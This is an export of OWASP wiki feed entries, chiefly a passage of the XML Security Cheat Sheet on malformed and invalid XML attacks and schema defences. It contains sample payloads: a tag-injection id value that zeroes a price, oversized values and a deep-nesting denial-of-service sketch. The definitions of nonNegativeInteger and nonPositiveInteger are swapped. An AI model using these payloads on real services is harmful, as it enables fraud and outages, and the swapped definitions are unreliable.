__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|OWASP Cheat Sheets Project]]&lt;br /&gt;
[[Category:OWASP_Document]]&lt;br /&gt;
[[Category:OWASP_Alpha_Quality_Document]]&lt;br /&gt;
[[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Cheatsheet_Navigation_Body&amp;diff=228673</id>
		<title>Template:Cheatsheet Navigation Body</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Cheatsheet_Navigation_Body&amp;diff=228673"/>
				<updated>2017-04-14T14:52:46Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: sorted the cheat sheets by alphabetical order and moved the xml security cheat sheet to assessment/breaker&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;See documentation of [[Template:navigationBoxBegin|the navigationBoxBegin template]] to see how this works...&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
{{navigationBoxBegin|title=[[Cheat_Sheets|Cheat Sheets]]|editlink={{FULLPAGENAME}}}}&lt;br /&gt;
{{navigationBoxRow|title=Developer / Builder|content=&lt;br /&gt;
* [[3rd_Party_Javascript_Management_Cheat_Sheet|3rd Party Javascript Management]]&lt;br /&gt;
* [[Access Control Cheat Sheet|Access Control]]&lt;br /&gt;
* [[AJAX Security Cheat Sheet]]&lt;br /&gt;
* [[Authentication Cheat Sheet|Authentication]] ([[Authentication_Cheat_Sheet_Español|ES]])&lt;br /&gt;
* [[Bean Validation Cheat Sheet]]&lt;br /&gt;
* [[Choosing and Using Security Questions Cheat Sheet|Choosing and Using Security Questions]]&lt;br /&gt;
* [[Clickjacking Defense Cheat Sheet|Clickjacking Defense]]&lt;br /&gt;
* [[C-Based Toolchain Hardening Cheat Sheet|C-Based Toolchain Hardening]]&lt;br /&gt;
* [[Credential Stuffing Prevention Cheat Sheet]]&lt;br /&gt;
* [[Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet|Cross-Site Request Forgery (CSRF) Prevention]]&lt;br /&gt;
* [[Cryptographic Storage Cheat Sheet|Cryptographic Storage]]&lt;br /&gt;
* [[Deserialization_Cheat_Sheet|Deserialization]]&lt;br /&gt;
* [[DOM based XSS Prevention Cheat Sheet|DOM based XSS Prevention]]&lt;br /&gt;
* [[Forgot Password Cheat Sheet|Forgot Password]]&lt;br /&gt;
* [[HTML5 Security Cheat Sheet|HTML5 Security]]&lt;br /&gt;
* [[HTTP Strict Transport Security Cheat Sheet|HTTP Strict Transport Security]]&lt;br /&gt;
* [[Injection Prevention Cheat Sheet]]&lt;br /&gt;
* [[Injection Prevention Cheat Sheet in Java]]&lt;br /&gt;
* [[JSON Web Token (JWT) Cheat Sheet for Java]]&lt;br /&gt;
* [[Input Validation Cheat Sheet|Input Validation]]&lt;br /&gt;
* [[JAAS Cheat Sheet|JAAS]]&lt;br /&gt;
* [[LDAP Injection Prevention Cheat Sheet|LDAP Injection Prevention]]&lt;br /&gt;
* [[Logging Cheat Sheet|Logging]]&lt;br /&gt;
* [[Mass Assignment Cheat Sheet]]&lt;br /&gt;
* [[.NET Security Cheat Sheet|.NET Security]]&lt;br /&gt;
* [[OWASP Top Ten Cheat Sheet|OWASP Top Ten]]&lt;br /&gt;
* [[Password Storage Cheat Sheet|Password Storage]]&lt;br /&gt;
* [[Pinning Cheat Sheet|Pinning]]&lt;br /&gt;
* [[Query Parameterization Cheat Sheet|Query Parameterization]]&lt;br /&gt;
* [[Ruby on Rails Cheatsheet|Ruby on Rails]]&lt;br /&gt;
* [[REST Security Cheat Sheet|REST Security]]&lt;br /&gt;
* [[Session Management Cheat Sheet|Session Management]]&lt;br /&gt;
* [[SAML Security Cheat Sheet|SAML Security]]&lt;br /&gt;
* [[SQL Injection Prevention Cheat Sheet|SQL Injection Prevention]]&lt;br /&gt;
* [[Transaction Authorization Cheat Sheet|Transaction Authorization]]&lt;br /&gt;
* [[Transport Layer Protection Cheat Sheet|Transport Layer Protection]]&lt;br /&gt;
* [[Unvalidated Redirects and Forwards Cheat Sheet|Unvalidated Redirects and Forwards]]&lt;br /&gt;
* [[User Privacy Protection Cheat Sheet|User Privacy Protection]]&lt;br /&gt;
* [[Web Service Security Cheat Sheet|Web Service Security]]&lt;br /&gt;
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet|XSS (Cross Site Scripting) Prevention]]&lt;br /&gt;
* [[XML External Entity (XXE) Prevention Cheat Sheet]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Assessment / Breaker|content=&lt;br /&gt;
* [[Attack Surface Analysis Cheat Sheet|Attack Surface Analysis]]&lt;br /&gt;
* [[REST Assessment Cheat Sheet|REST Assessment]]&lt;br /&gt;
* [[Web Application Security Testing Cheat Sheet|Web Application Security Testing]]&lt;br /&gt;
* [[XML Security Cheat Sheet]]&lt;br /&gt;
* [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Mobile|content=&lt;br /&gt;
* [[Android_Testing_Cheat_Sheet|Android Testing]]&lt;br /&gt;
* [[IOS Developer Cheat Sheet|IOS Developer]]&lt;br /&gt;
* [[Mobile Jailbreaking Cheat Sheet|Mobile Jailbreaking]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=OpSec / Defender|content=&lt;br /&gt;
* [[Virtual Patching Cheat Sheet|Virtual Patching]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Draft and Beta|content=&lt;br /&gt;
* [[Application Security Architecture Cheat Sheet|Application Security Architecture]]&lt;br /&gt;
* [[Business Logic Security Cheat Sheet|Business Logic Security]]&lt;br /&gt;
* [[Command Injection Defense Cheat Sheet]]&lt;br /&gt;
* [[Content Security Policy Cheat Sheet|Content Security Policy]]&lt;br /&gt;
* [[Denial of Service Cheat Sheet]]&lt;br /&gt;
* [[Grails Secure Code Review Cheat Sheet|Grails Secure Code Review]]&lt;br /&gt;
* [[Insecure Direct Object Reference Prevention Cheat Sheet|Insecure Direct Object Reference Prevention]]&lt;br /&gt;
* [[IOS Application Security Testing Cheat Sheet|IOS Application Security Testing]]&lt;br /&gt;
* [[Key Management Cheat Sheet|Key Management]]&lt;br /&gt;
* [[PHP Security Cheat Sheet|PHP Security]]&lt;br /&gt;
* [[Regular Expression Security Cheatsheet]]&lt;br /&gt;
* [[Secure Coding Cheat Sheet|Secure Coding]]&lt;br /&gt;
* [[Secure SDLC Cheat Sheet|Secure SDLC]]&lt;br /&gt;
* [[Threat Modeling Cheat Sheet|Threat Modeling]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxEnd|content=[[:Category:Cheatsheets|All Pages In This Category]]}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=225288</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=225288"/>
				<updated>2017-01-17T22:51:42Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Authors and Primary Editors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
